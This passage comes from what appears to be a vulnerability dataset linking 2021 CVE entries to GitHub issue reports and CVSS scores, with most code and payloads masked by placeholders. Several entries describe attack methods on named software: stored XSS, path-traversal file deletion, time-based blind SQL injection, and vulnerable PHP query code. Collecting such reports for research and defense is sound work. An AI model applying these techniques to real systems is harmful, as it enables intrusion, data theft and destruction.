  68921. "description": "URLs with no hostname not parsed properly in NUMBERTAG Hi there, I'm using this library to parse URLs with a custom protocol like so: APITAG The behaviour has changed in NUMBERTAG so that part of the pathname is being treated as the host. I believe this is a bug and goes against the browser implementation of URL , which produces a similar output similar to NUMBERTAG with the hostname unset. I think it's due to the change in regex match here URLTAG . Output in NUMBERTAG CODETAG Output in NUMBERTAG CODETAG Let me know if you need any more details. Thanks!",
  68922. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  68923. "severity": "MEDIUM",
  68924. "baseScore": 5.3,
  68925. "impactScore": 1.4,
  68926. "exploitabilityScore": 3.9
  68927. },
  68928. {
  68929. "CVE_ID": "CVE-2021-3664",
  68930. "Issue_Url_old": "https://github.com/unshiftio/url-parse/issues/206",
  68931. "Issue_Url_new": "https://github.com/unshiftio/url-parse/issues/206",
  68932. "Repo_new": "unshiftio/url-parse",
  68933. "Issue_Created_At": "2021-07-22T14:24:06Z",
  68934. "description": "Security issues Hostname spoofing & Open Redirect. MENTIONTAG MENTIONTAG I have reported a security issue in huntr URLTAG There are NUMBERTAG attack scenarios possible for Open Redirect and Hostname APITAG take a look at the last comment) Please validate and let us know your opinion on this. Thank you.",
  68935. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  68936. "severity": "MEDIUM",
  68937. "baseScore": 5.3,
  68938. "impactScore": 1.4,
  68939. "exploitabilityScore": 3.9
  68940. },
  68941. {
  68942. "CVE_ID": "CVE-2021-36654",
  68943. "Issue_Url_old": "https://github.com/boiteasite/cmsuno/issues/17",
  68944. "Issue_Url_new": "https://github.com/boiteasite/cmsuno/issues/17",
  68945. "Repo_new": "boiteasite/cmsuno",
  68946. "Issue_Created_At": "2021-07-09T00:02:59Z",
  68947. "description": "APITAG NUMBERTAG stored XSS. Hi :) cmsuno version NUMBERTAG is vulnerable to a stored cross site scripting. An authenticated attacker can inject a payload while updating the template's image filename after intercepting the request using Burpsuite via the tgo parameter. After successful update of the template, the xss is poped up in the website page. Steps to reproduce NUMBERTAG Go to FILETAG and click on plugins NUMBERTAG Click on Logo FILETAG NUMBERTAG Choose a random picture in your files repository, click on save and intercept the request using APITAG NUMBERTAG Change the tgo parameter value with the following FILETAG NUMBERTAG Forward the request and click on publish FILETAG NUMBERTAG Click on See the website FILETAG NUMBERTAG SS FILETAG FILETAG Thanks",
  68948. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  68949. "severity": "MEDIUM",
  68950. "baseScore": 5.4,
  68951. "impactScore": 2.7,
  68952. "exploitabilityScore": 2.3
  68953. },
  68954. {
  68955. "CVE_ID": "CVE-2021-36691",
  68956. "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/422",
  68957. "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/422",
  68958. "Repo_new": "libjxl/libjxl",
  68959. "Issue_Created_At": "2021-08-08T09:14:24Z",
  68960. "description": "Assertion failed in PATHTAG APITAG Describe the bug Assertion failed when compressing a gif with cjxl. CODETAG To Reproduce Steps to reproduce the behavior: CODETAG FILETAG Expected behavior No assertion failed. Environment OS: APITAG Compiler version: APITAG CPU type NUMBERTAG cjxl/djxl version string: cjxl NUMBERTAG f3e APITAG Additional context It seems that the memory allocation size is too large causing the assertion failed. URLTAG Some gdb information ERRORTAG",
  68961. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  68962. "severity": "HIGH",
  68963. "baseScore": 7.5,
  68964. "impactScore": 3.6,
  68965. "exploitabilityScore": 3.9
  68966. },
  68967. {
  68968. "CVE_ID": "CVE-2021-36692",
  68969. "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/308",
  68970. "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/308",
  68971. "Repo_new": "libjxl/libjxl",
  68972. "Issue_Created_At": "2021-07-09T12:29:54Z",
  68973. "description": "A stack use after scope issue with cjxl encode routine. Describe the bug A stack use after scope issue was discovered in cjxl encode routine when building with ASAN. To Reproduce Steps to reproduce the behavior: CODETAG The crash file FILETAG . Expected behavior cjxl should encode the PNG to JXL successfully. Environment OS NUMBERTAG generic NUMBERTAG Ubuntu Compiler version: clang version NUMBERTAG CPU type NUMBERTAG cjxl/djxl version string: cjxl NUMBERTAG APITAG Additional context ERRORTAG ERRORTAG",
  68974. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68975. "severity": "MEDIUM",
  68976. "baseScore": 6.5,
  68977. "impactScore": 3.6,
  68978. "exploitabilityScore": 2.8
  68979. },
  68980. {
  68981. "CVE_ID": "CVE-2021-36701",
  68982. "Issue_Url_old": "https://github.com/danpros/htmly/issues/481",
  68983. "Issue_Url_new": "https://github.com/danpros/htmly/issues/481",
  68984. "Repo_new": "danpros/htmly",
  68985. "Issue_Created_At": "2021-07-11T05:35:39Z",
  68986. "description": "Arbitrary file deletion and Persistent XSS exists on htmly NUMBERTAG An Arbitrary file deletion vulnerability in the backend In PATHTAG line NUMBERTAG ERRORTAG When we delete our backup files, we can delete any files on the system through directory traversal. APITAG example: When we login, we can go to setting > backup > Creat back, then we client delete, we can get a link. when we modify the file field to APITAG and submit. CODETAG The administrator information has been deleted and no one can login to the system NUMBERTAG Persistent XSS on Blog title Since the Blog title is not processed by htmlentities APITAG when we modify the Blog title to APITAG , Javascript is executed. APITAG APITAG NUMBERTAG Persistent XSS on Creating regular blog post. When we Creating regular blog post. Enter in Content APITAG and visit this article, Javascript is executed. APITAG APITAG",
  68987. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  68988. "severity": "CRITICAL",
  68989. "baseScore": 9.1,
  68990. "impactScore": 5.2,
  68991. "exploitabilityScore": 3.9
  68992. },
  68993. {
  68994. "CVE_ID": "CVE-2021-36797",
  68995. "Issue_Url_old": "https://github.com/victronenergy/venus/issues/836",
  68996. "Issue_Url_new": "https://github.com/victronenergy/venus/issues/836",
  68997. "Repo_new": "victronenergy/venus",
  68998. "Issue_Created_At": "2021-07-13T18:59:06Z",
  68999. "description": "APITAG Root login by default. I am using APITAG on a Raspberry Pi for testing purposes and it seems that the default account setup is against security best practices: Root login should be disabled with all access which requires root done through sudo A standard user should be configured for normal access (e.g. pi ) A default password may be provided but it should be forcibly changed on first login Auto login should be disabled by default The documentation should recommend changing the password As it is at the moment, there are likely many devices running APITAG with unsecured root privileges available by default. It would also be beneficial to add a security policy to this repo so that vulnerabilities such as this can be highlighted in private while they are addressed: URLTAG",
  69000. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69001. "severity": "MEDIUM",
  69002. "baseScore": 6.8,
  69003. "impactScore": 5.9,
  69004. "exploitabilityScore": 0.9
  69005. },
  69006. {
  69007. "CVE_ID": "CVE-2021-3681",
  69008. "Issue_Url_old": "https://github.com/ansible/galaxy/issues/1977",
  69009. "Issue_Url_new": "https://github.com/ansible/galaxy/issues/1977",
  69010. "Repo_new": "ansible/galaxy",
  69011. "Issue_Created_At": "2019-08-07T14:36:37Z",
  69012. "description": "Galaxy admin can't deprecated collections. Galaxy admin should be able to deprecate other account's collections.",
  69013. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  69014. "severity": "MEDIUM",
  69015. "baseScore": 5.5,
  69016. "impactScore": 3.6,
  69017. "exploitabilityScore": 1.8
  69018. },
  69019. {
  69020. "CVE_ID": "CVE-2021-36977",
  69021. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/272",
  69022. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/272",
  69023. "Repo_new": "hdfgroup/hdf5",
  69024. "Issue_Created_At": "2021-01-19T20:42:49Z",
  69025. "description": "Delegating open fuzzing issues of libmatio to hdf5. OSS library matio URLTAG is being continuously fuzzed by the oss fuzz URLTAG service. Most of the open matio fuzzing issues CVETAG seem to be related to the hdf NUMBERTAG library dependency which is is not being fuzzed by oss fuzz. Whom can I add as contact person for these issues? I believe the mail address needs to be setup as Google account in order to get access? See also URLTAG where I first raised this topic. FYI APITAG chromium",
  69026. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69027. "severity": "MEDIUM",
  69028. "baseScore": 6.5,
  69029. "impactScore": 3.6,
  69030. "exploitabilityScore": 2.8
  69031. },
  69032. {
  69033. "CVE_ID": "CVE-2021-36977",
  69034. "Issue_Url_old": "https://github.com/google/oss-fuzz/issues/4999",
  69035. "Issue_Url_new": "https://github.com/google/oss-fuzz/issues/4999",
  69036. "Repo_new": "google/oss-fuzz",
  69037. "Issue_Created_At": "2021-01-18T20:18:24Z",
  69038. "description": "What to do if issue is raised in dependent library?. Most of the open matio fuzzing issues CVETAG seem to be related to the hdf NUMBERTAG library dependency which is is not being fuzzed by oss fuzz. What can I do to get these open issues properly addressed. Can I reassign them to the HDF5 developers URLTAG ? Can we add secondary contact to the APITAG",
  69039. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69040. "severity": "MEDIUM",
  69041. "baseScore": 6.5,
  69042. "impactScore": 3.6,
  69043. "exploitabilityScore": 2.8
  69044. },
  69045. {
  69046. "CVE_ID": "CVE-2021-37144",
  69047. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/32",
  69048. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/32",
  69049. "Repo_new": "cskaza/cszcms",
  69050. "Issue_Created_At": "2021-07-20T20:33:42Z",
  69051. "description": "Bug Report: Multiple Arbitrary File Deletion vulnerability. Vulnerability Name: Multiple Arbitrary File Deletion Date of Discovery NUMBERTAG July NUMBERTAG Product version NUMBERTAG Download link URLTAG Author: faisalfs NUMBERTAG ulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the APITAG function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. Proof of Concept NUMBERTAG ulnerable URL: URLTAG Vulnerable Code: line NUMBERTAG PATHTAG FILETAG Steps to Reproduce NUMBERTAG Login as admin NUMBERTAG Goto Plugin Manager > Article > edit any article NUMBERTAG Upload any image as APITAG Picture\" and APITAG Upload\" and click save button NUMBERTAG Click APITAG File\" button for both APITAG Picture\" and APITAG Upload\" and click save button NUMBERTAG Intercept the request and replace existing image to any files on the server via parameter \"del_file\" and \"del_file2\" FILETAG Proof of Concept NUMBERTAG ulnerable URL: URLTAG Vulnerable Code: line NUMBERTAG PATHTAG FILETAG Step to Reproduce NUMBERTAG Login as admin NUMBERTAG Goto General Menu > Site Setting NUMBERTAG Upload any image as APITAG Logo\" and APITAG of og metatag\" and click save button NUMBERTAG Click APITAG File\" button for both APITAG Logo\" and APITAG of og metatag\" and click save button NUMBERTAG Intercept the request and replace existing image to any files on the server via parameter \"del_file\" and \"del_og_image\" FILETAG",
  69052. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  69053. "severity": "CRITICAL",
  69054. "baseScore": 9.1,
  69055. "impactScore": 5.2,
  69056. "exploitabilityScore": 3.9
  69057. },
  69058. {
  69059. "CVE_ID": "CVE-2021-37231",
  69060. "Issue_Url_old": "https://github.com/wez/atomicparsley/issues/30",
  69061. "Issue_Url_new": "https://github.com/wez/atomicparsley/issues/30",
  69062. "Repo_new": "wez/atomicparsley",
  69063. "Issue_Created_At": "2021-07-09T10:40:38Z",
  69064. "description": "A stack buffer overflow occurs while parsing a file. S ystem Configuration APITAG version: atomicparsley APITAG ERRORTAG NUMBERTAG f Used arguments: T NUMBERTAG t + Environment APITAG system, version and so on): Ubuntu NUMBERTAG bit Additional information: compilation with asan NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffffffd NUMBERTAG at pc NUMBERTAG ffff NUMBERTAG e NUMBERTAG d bp NUMBERTAG fffffffd NUMBERTAG sp NUMBERTAG fffffffcce8 WRITE of size NUMBERTAG at NUMBERTAG fffffffd NUMBERTAG thread T0 Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff6ffcc NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff6ffe NUMBERTAG b in APITAG () from PATHTAG NUMBERTAG ffff NUMBERTAG b4a NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff NUMBERTAG af7f7 in ?? () from PATHTAG NUMBERTAG ffff NUMBERTAG ed in ?? () from PATHTAG NUMBERTAG ffff NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG af in ?? () from PATHTAG NUMBERTAG fd NUMBERTAG in fread (__stream NUMBERTAG n NUMBERTAG c, __size NUMBERTAG ptr NUMBERTAG fffffffd6cd) at PATHTAG NUMBERTAG APITAG (buffer NUMBERTAG fffffffd6cd \"\", APITAG pos=<optimized out>, length NUMBERTAG c) at PATHTAG ERRORTAG PATHTAG NUMBERTAG a NUMBERTAG d0 in APITAG APITAG \"\", APITAG APITAG APITAG at PATHTAG ERRORTAG PATHTAG NUMBERTAG a NUMBERTAG b in APITAG (isofile=<optimized out>, optional_output=<optimized out>) at PATHTAG ERRORTAG PATHTAG I've attached the file. Please download and check the file. FILETAG",
  69065. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69066. "severity": "MEDIUM",
  69067. "baseScore": 5.5,
  69068. "impactScore": 3.6,
  69069. "exploitabilityScore": 1.8
  69070. },
  69071. {
  69072. "CVE_ID": "CVE-2021-37232",
  69073. "Issue_Url_old": "https://github.com/wez/atomicparsley/issues/32",
  69074. "Issue_Url_new": "https://github.com/wez/atomicparsley/issues/32",
  69075. "Repo_new": "wez/atomicparsley",
  69076. "Issue_Created_At": "2021-07-13T05:27:45Z",
  69077. "description": "A stack buffer overflow occurs while parsing movie details. System Configuration APITAG version: atomicparsley APITAG Used arguments: T NUMBERTAG t + Environment APITAG system, version and so on): Ubuntu NUMBERTAG bit Additional information: compilation with asan Description Buffer overflow occurs while NUMBERTAG bit APITAG NUMBERTAG line) because the size of the APITAG NUMBERTAG line) is small NUMBERTAG bytes NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffffffd8c5 at pc NUMBERTAG ffff NUMBERTAG e NUMBERTAG d bp NUMBERTAG fffffffd5d0 sp NUMBERTAG fffffffcd NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG fffffffd8c5 thread T NUMBERTAG ffff NUMBERTAG e NUMBERTAG c ( PATHTAG NUMBERTAG fd NUMBERTAG in fread PATHTAG NUMBERTAG fd NUMBERTAG in APITAG , _IO_FILE , unsigned long) PATHTAG NUMBERTAG a NUMBERTAG a0 in APITAG , _IO_FILE , Trackage , APITAG ) PATHTAG NUMBERTAG a NUMBERTAG in APITAG , unsigned char) PATHTAG NUMBERTAG c NUMBERTAG e7 in real_main(int, char ) PATHTAG NUMBERTAG ffff NUMBERTAG b2 in __libc_start_main ( PATHTAG NUMBERTAG d in _start ( PATHTAG ) Address NUMBERTAG fffffffd8c5 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a NUMBERTAG df in APITAG , unsigned char) PATHTAG This frame has NUMBERTAG object(s): FILETAG",
  69078. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69079. "severity": "CRITICAL",
  69080. "baseScore": 9.8,
  69081. "impactScore": 5.9,
  69082. "exploitabilityScore": 3.9
  69083. },
  69084. {
  69085. "CVE_ID": "CVE-2021-37262",
  69086. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/23",
  69087. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/23",
  69088. "Repo_new": "jflyfox/jfinal_cms",
  69089. "Issue_Created_At": "2021-06-10T19:40:20Z",
  69090. "description": "[SECURITY] Denial of service because of unsafe regex processing. I have tried to contact you by EMAILTAG and created URLTAG asking for the contact. Nobody replied. The APITAG is vulnerable to regex injection that may lead to Denial of Service. User controlled path and APITAG are used to build and run a regex expression (first argument to APITAG URLTAG Since the attacker controls the string and the regex pattern he may cause a APITAG by regex catastrophic backtracking on the server side.",
  69091. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69092. "severity": "HIGH",
  69093. "baseScore": 7.5,
  69094. "impactScore": 3.6,
  69095. "exploitabilityScore": 3.9
  69096. },
  69097. {
  69098. "CVE_ID": "CVE-2021-37274",
  69099. "Issue_Url_old": "https://github.com/purple-WL/CNVD-2020-75301/issues/1",
  69100. "Issue_Url_new": "https://github.com/purple-wl/cnvd-2020-75301/issues/1",
  69101. "Repo_new": "purple-wl/cnvd-2020-75301",
  69102. "Issue_Created_At": "2021-09-25T03:51:14Z",
  69103. "description": "Kingdee KIS Professional Edition Insecure Permissions. Vulnerability submission record APITAG",
  69104. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  69105. "severity": "HIGH",
  69106. "baseScore": 8.8,
  69107. "impactScore": 5.9,
  69108. "exploitabilityScore": 2.8
  69109. },
  69110. {
  69111. "CVE_ID": "CVE-2021-37381",
  69112. "Issue_Url_old": "https://github.com/caiteli/poc_information/issues/1",
  69113. "Issue_Url_new": "https://github.com/caiteli/poc_information/issues/1",
  69114. "Repo_new": "caiteli/poc_information",
  69115. "Issue_Created_At": "2021-07-28T10:24:17Z",
  69116. "description": "letter of thanks. Thank you for your submission about southsoft GMIS NUMBERTAG has a CSRF vulnerability ( CVETAG ). After receiving the vulnerability report, we verified and confirmed its effectiveness. We will fix this vulnerability as soon as possible in subsequent versions. Southsoft APITAG",
  69117. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  69118. "severity": "HIGH",
  69119. "baseScore": 8.8,
  69120. "impactScore": 5.9,
  69121. "exploitabilityScore": 2.8
  69122. },
  69123. {
  69124. "CVE_ID": "CVE-2021-3747",
  69125. "Issue_Url_old": "https://github.com/canonical/multipass/issues/2261",
  69126. "Issue_Url_new": "https://github.com/canonical/multipass/issues/2261",
  69127. "Repo_new": "canonical/multipass",
  69128. "Issue_Created_At": "2021-09-28T03:23:29Z",
  69129. "description": "placeholder. Placeholder.",
  69130. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  69131. "severity": "HIGH",
  69132. "baseScore": 7.8,
  69133. "impactScore": 5.9,
  69134. "exploitabilityScore": 1.8
  69135. },
  69136. {
  69137. "CVE_ID": "CVE-2021-37473",
  69138. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/26",
  69139. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/26",
  69140. "Repo_new": "navigatecms/navigate-cms",
  69141. "Issue_Created_At": "2021-07-22T04:24:26Z",
  69142. "description": "Multiple SQL Injection Vulnerabilities Identified in the latest version NUMBERTAG r NUMBERTAG Hi, I would like to report NUMBERTAG SQL Injection vulnerabilities identified in the latest version of the CMS. Vulnerability NUMBERTAG APITAG injection at APITAG vulnerable code: APITAG APITAG APITAG function APITAG { global $layout; global $DB; global $website; $out = ''; $item = new APITAG switch($_REQUEST FILETAG Vulnerability NUMBERTAG id at APITAG Vulnerable code APITAG : APITAG APITAG PATHTAG function APITAG { global $layout; global $DB; global $website; global $theme; global $user; $out = ''; $item = new APITAG switch($_REQUEST['act']) { case \"change_comment_status\": // change comment status if(empty($_REQUEST['id'])) { echo \"false\"; APITAG } switch($_REQUEST['opt']) { case 'publish': $DB >execute(' UPDATE nv_comments SET status NUMBERTAG WHERE website = '.$website >id.' AND APITAG id = '.$_REQUEST['id']); APITAG break; case 'unpublish': $DB >execute(' UPDATE nv_comments SET status NUMBERTAG WHERE website = '.$website >id.' AND APITAG id = '.$_REQUEST['id']); APITAG break; case 'delete': $DB >execute(' DELETE FROM nv_comments WHERE website = '.$website >id.' AND APITAG id = '.$_REQUEST['id']); APITAG break; } APITAG APITAG Attacker can use a traffic similar to: CODETAG Vulnerability NUMBERTAG APITAG at APITAG Vulnerable code APITAG APITAG PATHTAG function APITAG { global $layout; global $DB; global $website; global $theme; global $user; $out = ''; $item = new APITAG switch($_REQUEST['act']) { case 'products_order': if(!empty($_POST['products order'])) { APITAG { // save new order APITAG $response = APITAG order']); APITAG if($response!==true) { echo $response['error']; } else { echo 'true'; } } } APITAG APITAG Then it triggers ERRORTAG Vulnerability NUMBERTAG id in APITAG Vulnerable code: APITAG APITAG PATHTAG case \"change_comment_status\": if(empty($_REQUEST['id'])) { echo \"false\"; APITAG } switch($_REQUEST['opt']) { case 'publish': $DB >execute(' UPDATE nv_comments SET status NUMBERTAG APITAG WHERE website = '.$website >id.' AND id = '.$_REQUEST['id']); APITAG break; case 'unpublish': $DB >execute(' UPDATE nv_comments SET status NUMBERTAG APITAG WHERE website = '.$website >id.' AND id = '.$_REQUEST['id']); APITAG break; case 'delete': $DB >execute(' DELETE FROM nv_comments APITAG WHERE website = '.$website >id.' AND id = '.$_REQUEST['id']); APITAG break; } APITAG APITAG Attacker can easily craft something like this to trigger the vulnerability APITAG Vulnerability NUMBERTAG APITAG at APITAG vulnerable code: APITAG APITAG PATHTAG case 'load': case NUMBERTAG edit/new form if(!empty($_REQUEST['id'])) { APITAG { $item APITAG } else { $item APITAG } } if(isset($_REQUEST['form sent'])) { try { $item APITAG APITAG $item APITAG if(!empty($_REQUEST['property enabled'])) { $enableds = APITAG enabled']); } else { $enableds = APITAG } APITAG $item >id, $_REQUEST['template properties order'], $enableds); APITAG APITAG APITAG Then step into ERRORTAG Vulnerability NUMBERTAG APITAG at APITAG Vulnerable code: CODETAG Then steps into ERRORTAG Attacker can easily craft a traffic as below to cause the injection: APITAG",
  69143. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69144. "severity": "CRITICAL",
  69145. "baseScore": 9.8,
  69146. "impactScore": 5.9,
  69147. "exploitabilityScore": 3.9
  69148. },
  69149. {
  69150. "CVE_ID": "CVE-2021-37587",
  69151. "Issue_Url_old": "https://github.com/JHUISI/charm/issues/276",
  69152. "Issue_Url_new": "https://github.com/jhuisi/charm/issues/276",
  69153. "Repo_new": "jhuisi/charm",
  69154. "Issue_Created_At": "2021-07-21T14:01:46Z",
  69155. "description": "Broken schemes in last release . Hello, At CT RSA NUMBERTAG enema and Alpar presented attacks against NUMBERTAG schemes and two of them are implemented in the last version of CHARM: DAC MACS and MA ABE YJ NUMBERTAG FILETAG FILETAG Moreover, the YCT NUMBERTAG scheme was broken in NUMBERTAG and is also implemented in CHARM: FILETAG It is possible to attack the NUMBERTAG implementations and mount decryption attacks against them. References: URLTAG FILETAG",
  69156. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  69157. "severity": "MEDIUM",
  69158. "baseScore": 6.5,
  69159. "impactScore": 3.6,
  69160. "exploitabilityScore": 2.8
  69161. },
  69162. {
  69163. "CVE_ID": "CVE-2021-37593",
  69164. "Issue_Url_old": "https://github.com/advisto/peel-shopping/issues/3",
  69165. "Issue_Url_new": "https://github.com/advisto/peel-shopping/issues/3",
  69166. "Repo_new": "advisto/peel-shopping",
  69167. "Issue_Created_At": "2021-07-11T15:58:00Z",
  69168. "description": "SQL Injection in APITAG parameter APITAG Vulnerability Name: SQL Injection in APITAG parameter Date of Discovery NUMBERTAG July NUMBERTAG Product version NUMBERTAG Download link URLTAG Author: faisalfs NUMBERTAG ulnerability Description: Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the \"_id_\" parameter on the PATHTAG endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data. Vulnerable URL: _ URLTAG Proof of Concept NUMBERTAG Assumed peel shopping NUMBERTAG out of box installation database name is _peel_. This query will check if APITAG name like _hex(%peel%)_ it will delay for NUMBERTAG seconds before redirect to homepage ( URLTAG that indicates TRUE SQL statement which mean the database name like \"_peel_\". url : URLTAG FILETAG NUMBERTAG Assumed the web is using APITAG database server check if db_version like APITAG it will delay for NUMBERTAG seconds if TRUE. url : URLTAG FILETAG NUMBERTAG By default, the database have a table name = peel_produits. This query will check if table_name _peel_produits_ is exist, it will delay for NUMBERTAG seconds if TRUE, else will redirect to homepage instantly. url : URLTAG FILETAG To produce SQL syntax error, it is possible to intercept the request before it is redirect to homepage using a tool like APITAG (repeater). Error syntax: URLTAG NUMBERTAG FILETAG NUMBERTAG FILETAG Dump table name = peel_profil FILETAG Consequences: Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities. Integrity: Just as it may be possible to read sensitive information eg client/customer sensitive data, it is also possible to make changes or even delete this information with a SQL Injection attack. Mitigation: Use of Prepared Statements (with Parameterized Queries) References for Mitigation Vulnerability: FILETAG",
  69169. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  69170. "severity": "CRITICAL",
  69171. "baseScore": 9.1,
  69172. "impactScore": 5.2,
  69173. "exploitabilityScore": 3.9
  69174. },
  69175. {
  69176. "CVE_ID": "CVE-2021-37600",
  69177. "Issue_Url_old": "https://github.com/karelzak/util-linux/issues/1395",
  69178. "Issue_Url_new": "https://github.com/util-linux/util-linux/issues/1395",
  69179. "Repo_new": "util-linux/util-linux",
  69180. "Issue_Created_At": "2021-07-27T08:45:02Z",
  69181. "description": "Potential integer overflow in ipcutils.c. Hi, It seems that there exists a potential integer overflow that can lead buffer overflows. Please find the following description NUMBERTAG APITAG can be an arbitrary large number URLTAG NUMBERTAG Call to APITAG with the structure URLTAG NUMBERTAG Call to calloc with the large integer can cause a memory allocation with an overflowed size URLTAG",
  69182. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69183. "severity": "MEDIUM",
  69184. "baseScore": 5.5,
  69185. "impactScore": 3.6,
  69186. "exploitabilityScore": 1.8
  69187. },
  69188. {
  69189. "CVE_ID": "CVE-2021-37704",
  69190. "Issue_Url_old": "https://github.com/flextype/flextype/issues/567",
  69191. "Issue_Url_new": "https://github.com/flextype/flextype/issues/567",
  69192. "Repo_new": "flextype/flextype",
  69193. "Issue_Created_At": "2021-08-12T03:43:50Z",
  69194. "description": "phpinfo APITAG shows PHP information including values of APITAG cookies.. All NUMBERTAG ersions (prior to NUMBERTAG are affected. System Information Leak ( APITAG ) vulnerability in flextype NUMBERTAG ia the APITAG parameter to NUMBERTAG PATHTAG NUMBERTAG PATHTAG it's allows remote attackers to obtain configuration information via a phpinfo action in a request to FILETAG , which calls the phpinfo function. FILETAG FILETAG FILETAG FILETAG",
  69195. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  69196. "severity": "MEDIUM",
  69197. "baseScore": 4.3,
  69198. "impactScore": 1.4,
  69199. "exploitabilityScore": 2.8
  69200. },
  69201. {
  69202. "CVE_ID": "CVE-2021-37764",
  69203. "Issue_Url_old": "https://github.com/XOS-Shop/xos_shop_system/issues/1",
  69204. "Issue_Url_new": "https://github.com/xos-shop/xos_shop_system/issues/1",
  69205. "Repo_new": "xos-shop/xos_shop_system",
  69206. "Issue_Created_At": "2021-07-24T23:10:12Z",
  69207. "description": "Security Bug: Arbitrary File Deletion in Admin Panel. Hi MENTIONTAG , I found a file deletion vulnerability in the admin function module Vulnerability Name: Arbitrary File Deletion in Admin Panel Date of Discovery NUMBERTAG July NUMBERTAG Product version NUMBERTAG ulnerability Description: Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.",
  69208. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  69209. "severity": "HIGH",
  69210. "baseScore": 8.1,
  69211. "impactScore": 5.2,
  69212. "exploitabilityScore": 2.8
  69213. },
  69214. {
  69215. "CVE_ID": "CVE-2021-37770",
  69216. "Issue_Url_old": "https://github.com/NucleusCMS/NucleusCMS/issues/96",
  69217. "Issue_Url_new": "https://github.com/nucleuscms/nucleuscms/issues/96",
  69218. "Repo_new": "nucleuscms/nucleuscms",
  69219. "Issue_Created_At": "2019-12-02T16:20:24Z",
  69220. "description": "File upload vulnerability in Nucleus CMS NUMBERTAG Description: I found a file upload vulnerability. In this vulnerability, we can use upload to change the upload path to the path without. Htaccess file. Upload an. Htaccess file and write it to APITAG application / FILETAG . In this way, we can upload a picture with shell, treat it as PHP, execute our commands, so as to take down the whole website Resources and permissions for. Because I don't know why my picture can't be uploaded, so I wrote the detailed utilization process in this page, hope you can see it URLTAG I would like to submit this vulnerability to CVE mitre. I hope you can fix this vulnerability as soon as possible Looking forward to your response.",
  69221. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  69222. "severity": "HIGH",
  69223. "baseScore": 7.2,
  69224. "impactScore": 5.9,
  69225. "exploitabilityScore": 1.2
  69226. },
  69227. {
  69228. "CVE_ID": "CVE-2021-37778",
